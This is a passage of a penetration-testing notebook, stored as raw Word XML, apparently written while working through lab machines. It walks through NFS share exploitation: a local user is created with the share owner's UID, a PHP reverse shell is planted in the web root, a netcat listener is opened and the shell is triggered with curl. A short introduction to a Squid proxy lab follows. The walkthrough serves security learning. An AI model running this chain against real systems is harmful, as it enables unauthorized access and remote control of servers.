          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5353050" cy="800100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="477" name="image476.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image476.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1043"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5353050" cy="800100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FA8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="948"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Directory is owned by the UID 2017</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FA9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="948"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Belongs to the group with the ID of www-data, or 33 (www-data usually has GID 33)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FAA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FAB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since NFS has no mechanism for authentication or authorization whatsoever, by assuming the identity of the share's owner, we also assume their permissions on the directory itself.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FAC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FAD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The plan now is to imitate the user with the UID of 2017 , try adding a php file containing our reverse shell to the webserver and then use our browser to trigger it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FAE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FAF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We start by creating a new user on our local machine, and assign them the respective UID:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FB0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1380"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo useradd xela</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FB1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FB2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This user will by default have a UID/GID of the highest ID found in /etc/passwd , plus one. Usually this will be 1001 . To change the UID, we run the following command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FB3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1033"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo usermod -u 2017 xela</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FB4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FB5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In theory, we can leave the GID as is, but for complecity's sake we can change it as follows, using groupmod</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="415"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo groupmod -g 2017 xela</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FB7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FB8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can verify our new user's data by taking a look at our /etc/passwd file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FB9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="893"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /etc/passwd | grep xela</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FBA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="432"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3971925" cy="1333500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="37" name="image30.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image30.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1044"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="397192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2FBB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FBC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FBD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Having created our impostor user, we should now be able to interact with the share mounted on /mount/1, namely /var/www/html , by using su to run commands as xela.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FBE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1029"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo su xela</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FBF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1029"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We switch to the user xela, to finally impersonate as xela</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FC0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FC1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FC2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2324100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="118" name="image111.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image111.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1045"/>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2FC3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="439"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After running "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls -al /mnt/1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">", we can finally see that we are able to view all the contents of the NFS directory. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The impersonation worked!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FC4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FC5">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Having assumed the UID/GID of 2017, we have successfully impersonated the directory's owner and can now, under the assumption that the share has been configured to allow </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rw privileges</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, write arbitrary files to that directory.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FC6">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FC7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We now add a reverse php shell,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> such as </w:t>
      </w:r>
      <w:hyperlink r:id="rId1046">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">pentestmonkey's</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and save it as shell.php in the webserver's filesystem.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="165"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Curl the script into the mount, and this will affect the original directory, so the website will have the reverse shell now. Make sure to edit the reverse shell to include correct numbers (like local IP, local port)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="165"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NFS (Network File System) provides a direct link between the client (your local machine) and the server.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> When you mount an NFS share locally (e.g., /mnt/1), you are working on the same files that exist on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FCA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FCB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">While on one shell we set up a netcat listener, all that's left to do is curl the script we just added to the web server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FCC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1023"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rlwrap nc -lvnp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FCD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1023"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl http://10.10.11.191/shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FCE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1023"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">where "shell.php" is the name of the reverseshell </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FCF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FD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2FD1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_h0kepk9ks67l" w:id="423"/>
      <w:bookmarkEnd w:id="423"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Squid proxy (squid-cache)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FD2">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1047">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Squid</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice, we saw</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Port 3128 — Squid Proxy 4.14</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FD3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FD4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We are familiar with proxies,</w:t>
      </w:r>
      <w:hyperlink r:id="rId1048">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId1049">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Burp Suite</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is another web proxy we use quite frequently. In summary, rather than directly access that dirty slow internet, this service is acting as a go-between from the server to the outside world at large. It offers security (allegedly) and speed improvements in the form of caching frequent destinations.</w:t>
      </w:r>
